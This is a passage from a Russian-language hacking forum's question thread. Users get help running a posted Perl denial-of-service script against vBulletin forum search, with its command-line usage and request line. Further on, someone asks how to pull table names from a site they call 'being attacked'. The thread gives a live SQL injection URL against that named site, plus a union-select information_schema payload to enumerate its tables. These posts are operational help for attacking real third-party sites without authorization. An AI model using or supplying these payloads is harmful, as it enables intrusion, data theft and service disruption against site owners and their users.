![]() |
[Задай Вопрос - Получи Ответ]
Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп |
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48 |
Цитата:
2. Какие параметры?, это видно из исходника сплоента: Код:
if (@ARGV < 2) { &usage; }perl c:/1.pl www.test1.ru /forum/ Обрати внимание имя директории с форумом должно быть вместе с двумя слешами (в начале и конце имени), это видно по тому как формируется пакет: Код:
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".P.S. по поводу того что это старье - тут нечему удивлятся, тем кто копипастит всё это глубого побарабану новое оно или старое, а про описание я вообще промолчу. |
гугл сказал что это для версии vBulletin <= 3.6.3
|
всем хай,научите новичка sql инъекции... плиз
|
по моему самый лучший мануал по Скулям http://forum.antichat.ru/showthread.php?t=43966
юзай поиск то |
Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте? вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/* там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается. Может есть какие команды? |
Я не знаю где написать решили тут...
Короче есть в городе провайдер я к нему подключён, он представляет форум внутри сети , но войти может только с подключением внешки который имеет ип вида ***.**.**.**, а Ip сетевой предоставленной провайдером вид 10.*.*.***, так вот вопрос можно ли войти в форум не включай внехи а просто по локалке ? |
Цитата:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/* |
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
|
| Время: 19:20 |